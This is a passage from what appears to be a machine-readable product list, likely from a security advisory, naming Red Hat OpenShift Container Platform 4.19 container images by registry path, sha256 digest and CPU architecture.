"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
